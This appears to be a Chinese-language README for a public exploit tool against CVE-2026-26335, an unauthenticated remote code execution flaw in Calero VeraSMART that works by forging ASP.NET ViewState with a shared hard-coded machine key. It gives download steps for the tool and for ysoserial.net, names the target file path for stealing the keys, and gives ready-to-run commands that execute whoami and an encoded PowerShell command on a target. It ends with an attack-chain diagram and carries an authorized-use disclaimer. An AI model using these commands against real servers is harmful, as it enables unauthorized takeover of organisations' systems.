CVE-2026-26335 的自动化利用工具,该漏洞是 Calero VeraSMART 中一个严重的未认证远程代码执行(RCE)漏洞,通过使用静态机器密钥伪造 ASP.NET ViewState 实现利用。包含端点发现、载荷生成和命令执行功能。
Mohammed Idrees Banyamer 安全研究员
CVE‑2026‑26335 是 Calero VeraSMART(2022 R1 之前版本)中的一个严重未认证远程代码执行漏洞。
该应用程序使用静态硬编码的 ASP.NET 计算机密钥,且在所有安装实例中共享。
拥有这些密钥的攻击者可以伪造恶意的 ASP.NET ViewState 并触发服务端反序列化 → RCE。
此漏洞利用工具可自动化执行:
__VIEWSTATEGENERATOR 提取CWE‑321 — 硬编码加密密钥
VeraSMART 部署实例重复使用相同的 ASP.NET machineKey:
<machineKey validationKey="STATIC_KEY"
decryptionKey="STATIC_KEY"
validation="SHA1"
decryption="AES" />
任何拥有单个安装实例密钥的攻击者都可以攻击所有实例。
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
密钥并非公开。可从目标获取:
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
或通过配套的文件读取漏洞:
CVE‑2026‑26333
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
9.8 — 严重 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
已在 VeraSMART 2022 R1 中修复:
临时解决方案:
仅供教育和授权测试使用。 仅可用于您拥有或已获得评估许可的系统。
Mohammed Idrees Banyamer 安全研究员
下图展示了 CVE‑2026‑26335 在 Calero VeraSMART 中的利用链,静态 ASP.NET 计算机密钥允许伪造恶意 ViewState,从而导致远程代码执行。
flowchart LR
A[Attacker] --> B[Obtain VeraSMART machineKey]
B --> C[Discover ViewState endpoint]
C --> D[Extract __VIEWSTATEGENERATOR]
D --> E[Generate malicious ViewState via ysoserial]
E --> F[Sign payload with machineKey]
F --> G[Send forged POST request]
G --> H[ASP.NET ViewState deserialization]
H --> I[TypeConfuseDelegate gadget]
I --> J[Remote Code Execution on IIS]